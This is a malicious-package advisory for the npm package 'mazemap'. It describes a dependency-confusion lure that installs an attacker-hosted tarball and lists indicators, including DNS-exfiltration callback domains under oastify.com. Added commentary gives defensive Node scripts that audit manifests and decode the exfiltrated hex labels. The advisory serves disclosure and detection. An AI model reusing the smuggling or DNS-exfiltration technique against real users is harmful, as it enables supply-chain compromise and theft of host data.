MAL-2026-5448

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/mazemap/MAL-2026-5448.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5448
Published
2026-06-09T17:24:06Z
Modified
2026-06-09T18:01:36.562816451Z
Summary
Malicious code in mazemap (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (751317dcad79cec866b8dc69cd60b39e3be8e1bcc45746039835b04ce32445b0)

package.json declares a single dependency, ltidisafe, as a direct HTTPS tarball URL (https://ltidi.storage.googleapis.com/depenconf/ltidisafe-3.0.2.tgz) on a generic Google Cloud Storage bucket rather than as a version range resolved from the npm registry. When a user runs npm install mazemap, npm fetches that tarball and installs it, running any lifecycle scripts (preinstall, install, postinstall) it declares. The bucket owner can replace the tarball at any time and it is never subject to registry vetting, so the hashes recorded below for mazemap-99.9.1.tgz say nothing about what ltidisafe delivered at any given moment.

The package itself is a hollow lure: index.js is a 35-byte module.exports = {};, there is no description or author, the license is the ISC default, and the version is 99.9.1. An implausibly high version is a recognized dependency-confusion technique: a resolver that prefers the highest available version will pick the public package over an internal package of the same name. The bucket path segment is literally depenconf.

Taken together, the hollow main, the inflated version, the anonymously hosted GCS dependency and the name collision with a real product (MazeMap) form a dependency-confusion / smuggling shape whose only on-install effect is to pull and execute attacker-controlled code from a non-registry source.
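The manifest shape described above (remote tarball dependency, inflated version, no metadata, empty entry point) can be checked mechanically before a package is allowed into a build. The following Node script is an added example, not code from the advisory or the mazemap project. The SAMPLE_MANIFEST is constructed from the advisory's description rather than copied from the real package, and the rule names and the version threshold of 50 are assumptions chosen for illustration.

```javascript
// Added example: audit a package.json for the dependency-smuggling shape
// described in the advisory. Constructed sample, not the real package file.
const SAMPLE_MANIFEST = {
  name: "mazemap",
  version: "99.9.1",
  main: "index.js",
  license: "ISC",
  dependencies: {
    ltidisafe: "https://ltidi.storage.googleapis.com/depenconf/ltidisafe-3.0.2.tgz",
  },
};

// Fields whose specifiers npm resolves and installs.
const DEP_FIELDS = ["dependencies", "devDependencies", "optionalDependencies"];
// Lifecycle hooks npm runs automatically during install.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];
// Specifier forms that bypass the registry: remote tarballs, git URLs and
// shorthands, local paths. A semver range or dist-tag matches none of these.
const NON_REGISTRY_SPEC =
  /^(?:https?:\/\/|git(?:\+\w+)?:|ssh:\/\/|github:|gitlab:|bitbucket:|gist:|file:|\.{0,2}\/|~\/)/i;
const GITHUB_SHORTHAND = /^[\w.-]+\/[\w.-]+(?:#.*)?$/;
// Assumed threshold: majors this high are far more often a version-race
// trick than a real release train.
const INFLATED_MAJOR = 50;

// Returns a list of findings; an empty list means nothing looked off.
// fileContents optionally maps file paths to source so the entry point
// can be inspected as well.
function auditManifest(manifest, fileContents = {}) {
  const findings = [];

  for (const field of DEP_FIELDS) {
    for (const [name, spec] of Object.entries(manifest[field] || {})) {
      const s = String(spec);
      if (NON_REGISTRY_SPEC.test(s) || GITHUB_SHORTHAND.test(s)) {
        findings.push({ rule: "non-registry-dependency", field, name, spec: s });
      }
    }
  }

  const major = parseInt(String(manifest.version || "0"), 10);
  if (Number.isFinite(major) && major >= INFLATED_MAJOR) {
    findings.push({ rule: "inflated-version", version: manifest.version });
  }

  if (!manifest.description && !manifest.author && !manifest.repository) {
    findings.push({ rule: "missing-metadata" });
  }

  const scripts = manifest.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    if (scripts[hook]) {
      findings.push({ rule: "lifecycle-script", hook, command: scripts[hook] });
    }
  }

  // An entry point that exports nothing, as the advisory describes for index.js.
  const entry = manifest.main || "index.js";
  const src = fileContents[entry];
  if (typeof src === "string" && /^\s*module\.exports\s*=\s*\{\s*\}\s*;?\s*$/.test(src)) {
    findings.push({ rule: "hollow-main", file: entry });
  }

  return findings;
}

// Demo run against the constructed sample; the index.js body is the one the
// advisory quotes.
for (const f of auditManifest(SAMPLE_MANIFEST, { "index.js": "module.exports = {};\n" })) {
  console.log(JSON.stringify(f));
}
```

Note that a script like this only inspects the package being installed; the lifecycle scripts that do the damage here live in the ltidisafe tarball, which is fetched from a bucket the attacker controls. The durable control is to stop npm from running install hooks at all (ignore-scripts=true in .npmrc, or npm install --ignore-scripts) and to fail CI on any dependency specifier that is not a registry version range.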

Database specific
{
    "malicious-packages-origins": [
        {
            "modified_time": "2026-06-09T17:24:06Z",
            "versions": [
                "99.9.1"
            ],
            "sha256": "751317dcad79cec866b8dc69cd60b39e3be8e1bcc45746039835b04ce32445b0",
            "id": "IN-MAL-2026-005033",
            "source": "amazon-inspector",
            "import_time": "2026-06-09T17:45:50.097394313Z"
        },
        {
            "modified_time": "2026-06-09T17:24:07Z",
            "versions": [
                "99.9.1"
            ],
            "sha256": "ecccd07042bcd8a96f5ad7d2cdba5ecd1b36fac689210c4bdd4575b2d9a92cb6",
            "id": "IN-MAL-2026-005034",
            "source": "amazon-inspector",
            "import_time": "2026-06-09T17:45:50.138728626Z"
        }
    ]
}
References
Credits

Affected packages

npm / mazemap

Package

Affected ranges

Affected versions

99.*
99.9.1

Database specific

indicators
{
    "evidence_files": [
        {
            "sha256": "06e43470ff0eafc309308403464434f5afd314d40265922d8ef5de296b1c9465",
            "tlsh": "b9e0c2244a6566334ec911b64c2a655bf3b18e5f4418bc1d6bdb042c418dab338f925d",
            "path": "package.json"
        }
    ],
    "domains": [
        "ltidi.storage.googleapis.com",
        "7363616e.mazemap.5djpny9mibugmvyzxuakcrzv1m7d41upj.oastify.com",
        "7363616e2d633063303364613663333833.mazemap.5djpny9mibugmvyzxuakcrzv1m7d41upj.oastify.com",
        "2f686f6d652f7363616e.mazemap.5djpny9mibugmvyzxuakcrzv1m7d41upj.oastify.com"
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-M7oJSA6NNnUgXkUS1FKHFB24H3owMcoRUonZQxz8dJoSXOXRZqm0zmpTdQZlZW+VBt85JkmDUwyEZdWMuCdCTw==",
                "sha1": "d2b808b547cfbd8a923768e468f375e1a60729c3"
            },
            "filename": "mazemap-99.9.1.tgz"
        }
    ]
}
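Three of the four indicator domains above end in oastify.com, the domain used by Burp Suite's Collaborator service, and follow the layout <hex data>.mazemap.<collaborator id>.oastify.com: the install-time payload exfiltrates data by encoding it as a DNS label and resolving the name. The script below is an added example, not part of the advisory; it copies the four domains from the indicators block, identifies the out-of-band callbacks, and decodes the hex labels. The decoded strings are "scan", "scan-c0c03da6c383" and "/home/scan". Reading those as a user name, a host name and a home directory collected from the machine that ran the install is my inference, not a statement the advisory makes.

```javascript
// Added example: identify and decode out-of-band DNS exfiltration indicators.
// Domains copied from the advisory's indicators block.
const INDICATOR_DOMAINS = [
  "ltidi.storage.googleapis.com",
  "7363616e.mazemap.5djpny9mibugmvyzxuakcrzv1m7d41upj.oastify.com",
  "7363616e2d633063303364613663333833.mazemap.5djpny9mibugmvyzxuakcrzv1m7d41upj.oastify.com",
  "2f686f6d652f7363616e.mazemap.5djpny9mibugmvyzxuakcrzv1m7d41upj.oastify.com",
];

// Public out-of-band (OAST) callback suffixes: the first two belong to Burp
// Collaborator, the rest are interactsh defaults.
const OAST_SUFFIXES = [
  "oastify.com", "burpcollaborator.net", "interact.sh", "oast.pro", "oast.live",
  "oast.site", "oast.online", "oast.fun", "oast.me",
];

// A DNS label is at most 63 characters, so exfiltrated data is typically
// hex-encoded and, when longer, split across several leading labels.
// Returns the decoded text if the label is all hex pairs and yields
// printable ASCII, otherwise null.
function decodeHexLabel(label) {
  if (!/^(?:[0-9a-f]{2})+$/i.test(label)) return null;
  const text = Buffer.from(label, "hex").toString("latin1");
  return /^[\x20-\x7e]+$/.test(text) ? text : null;
}

// Parses <data labels...>.<tag>.<collaborator id>.<suffix>; returns null
// when the domain is not under a known OAST suffix.
function parseOastDomain(domain) {
  const lower = domain.toLowerCase();
  const suffix = OAST_SUFFIXES.find((s) => lower === s || lower.endsWith("." + s));
  if (!suffix) return null;
  const prefix = lower === suffix ? "" : lower.slice(0, -(suffix.length + 1));
  const labels = prefix ? prefix.split(".") : [];
  const collaboratorId = labels.pop() ?? "";
  const tag = labels.pop() ?? "";
  const decoded = labels.map(decodeHexLabel);
  return {
    domain,
    suffix,
    collaboratorId,
    tag,
    rawLabels: labels,
    // Only report a decoded value when every data label decoded cleanly.
    decoded: decoded.length > 0 && decoded.every((d) => d !== null) ? decoded.join("") : null,
  };
}

function analyzeIndicators(domains) {
  const oast = [];
  const other = [];
  for (const d of domains) {
    const parsed = parseOastDomain(d);
    if (parsed) oast.push(parsed);
    else other.push(d);
  }
  return { oast, other };
}

const report = analyzeIndicators(INDICATOR_DOMAINS);
for (const hit of report.oast) {
  console.log(`${hit.suffix} id=${hit.collaboratorId} tag=${hit.tag} data=${JSON.stringify(hit.decoded)}`);
}
for (const d of report.other) console.log(`non-OAST indicator: ${d}`);
```

The collaborator id label is what ties all three lookups to one attacker session, and the tag label carries the package name, which is how a campaign operator sorts callbacks when the same payload ships under several lure names. For detection, alerting on any resolution of these suffixes from build or developer hosts is cheap and has very few legitimate sources outside of pentest tooling.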
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/mazemap/MAL-2026-5448.json"